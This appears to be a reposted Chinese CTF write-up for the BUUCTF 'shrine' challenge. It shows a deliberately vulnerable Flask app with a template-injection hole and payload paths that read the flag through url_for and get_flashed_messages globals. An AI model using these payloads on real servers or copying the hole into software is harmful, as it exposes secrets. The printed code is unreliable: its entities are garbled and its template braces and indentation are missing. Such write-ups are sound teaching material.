BUUCTF：[WesternCTF2018]shrine

篇首语：本文由编程笔记#小编为大家整理，主要介绍了BUUCTF：[WesternCTF2018]shrine相关的知识，希望对你有一定的参考价值。

https://buuoj.cn/challenges#[WesternCTF2018]shrine


import flask
import os
app &＃61; flask.Flask(__name__)
app.config[&＃39;FLAG&＃39;] &＃61; os.environ.pop(&＃39;FLAG&＃39;)
&＃64;app.route(&＃39;/&＃39;)
def index():
return open(__file__).read()
&＃64;app.route(&＃39;/shrine/&＃39;)
def shrine(shrine):
def safe_jinja(s):
s &＃61; s.replace(&＃39;(&＃39;, &＃39;&＃39;).replace(&＃39;)&＃39;, &＃39;&＃39;)
blacklist &＃61; [&＃39;config&＃39;, &＃39;self&＃39;]
return &＃39;&＃39;.join([&＃39;% set &＃61;None%&＃39;.format(c) for c in blacklist]) &＃43; s
return flask.render_template_string(safe_jinja(shrine))
if __name__ &＃61;&＃61; &＃39;__main__&＃39;:
app.run(debug&＃61;True)


过滤了小括号()、config、self&＃xff0c;且FLAG在环境变量中&＃xff0c;这里的过滤只针对config管用
过滤了小括号基本上就没法使用各种类的方法了&＃xff0c;而这里FLAG在环境变量中

可利用Flask内置的两个函数&＃xff1a;

• url_for()
• get_flashed_messages()

/shrine/url_for.__globals__
/shrine/get_flashed_messages.__globals__


利用其中的current_app方法&＃xff0c;可以直接查看到当前app的config

/shrine/url_for.__globals__[&＃39;current_app&＃39;].config
/shrine/get_flashed_messages.__globals__[&＃39;current_app&＃39;].config